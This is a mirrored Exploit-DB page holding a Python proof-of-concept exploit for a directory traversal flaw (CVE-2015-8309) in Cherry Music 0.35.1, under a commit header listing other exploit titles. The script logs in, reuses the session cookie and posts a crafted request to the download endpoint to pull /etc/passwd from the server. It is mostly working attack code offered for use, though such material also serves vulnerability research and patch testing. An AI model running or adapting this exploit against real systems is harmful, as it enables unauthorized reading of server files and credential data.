bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/php/webapps/40361.py
Offensive Security d5138d6962 DB: 2016-09-14 
17 new exploits

Microsoft Windows Media Player 7.0 - '.wms' Arbitrary Script
Cherry Music 0.35.1 - Arbitrary File Disclosure
Battle.Net 1.5.0.7963 - Insecure File Permissions Privilege Escalation
Windows x86 - Password Protected TCP Bind Shell (637 bytes)
wdCalendar 2 - SQL Injection
Zapya Desktop 1.803 - (ZapyaService.exe) Privilege Escalation
Exper EWM-01 ADSL/MODEM - Unauthenticated DNS Change

Open-Xchange App Suite 7.8.2 - Cross Site Scripting

Open-Xchange Guard 2.4.2 - Multiple Cross Site Scripting

Multiple Icecream Apps - Insecure File Permissions Privilege Escalation

WinSMS 3.43 - Insecure File Permissions Privilege Escalation

Microsoft Internet Explorer 11.0.9600.18482 - Use After Free

AIOCP 1.3.x - 'cp_dpage.php' Full Path Disclosure
AIOCP 1.3.x - Multiple Vulnerabilities

ASUS DSL-X11 ADSL Router - Unauthenticated DNS Change

COMTREND ADSL Router CT-5367 C01_R12_ CT-5624 C01_R03 - Unauthenticated DNS Change

Tenda ADSL2/2+ Modem 963281TAN - Unauthenticated DNS Change

PLANET VDR-300NU ADSL Router - Unauthenticated DNS Change

PIKATEL 96338WS_ 96338L-2M-8M - Unauthenticated DNS Change

Inteno EG101R1 VoIP Router - Unauthenticated DNS Change
2016-09-14 05:08:39 +00:00

36 lines
No EOL
1.3 KiB
Python
Executable file
Raw Blame History

# Exploit Title: Cherry Music v0.35.1 directory traversal vulnerability allows authenticated users to download arbitrary files
# Date: 11-09-2016
# Exploit Author: feedersec
# Contact: feedersec@gmail.com
# Vendor Homepage: http://www.fomori.org/cherrymusic/index.html
# Software Link: http://www.fomori.org/cherrymusic/versions/cherrymusic-0.35.1.tar.gz
# Version: 0.35.1
# Tested on: ubuntu 14.04 LTS
# CVE : CVE-2015-8309
import urllib2, cookielib, urllib
#set parameters here
username = 'admin'
password = 'Password01'
baseUrl = 'http://localhost:8080/'
targetFile = '/etc/passwd'
downloadFileName = 'result.zip'
####
cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
params = urllib.urlencode({'username': username, 'password': password, 'login': 'login'})
req = urllib2.Request(baseUrl, params)
response = opener.open(req)
for c in cj:
if c.name == "session_id":
session_id = c.value
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
opener.addheaders.append(('Cookie', 'session_id=' + session_id))
params = urllib.urlencode({'value': '["' + targetFile + '"]'})
request = urllib2.Request(baseUrl + "download", params)
response = opener.open(request).read()
with open(downloadFileName, 'wb') as zipFile:
zipFile.write(response)
Reference in a new issue View git blame Copy permalink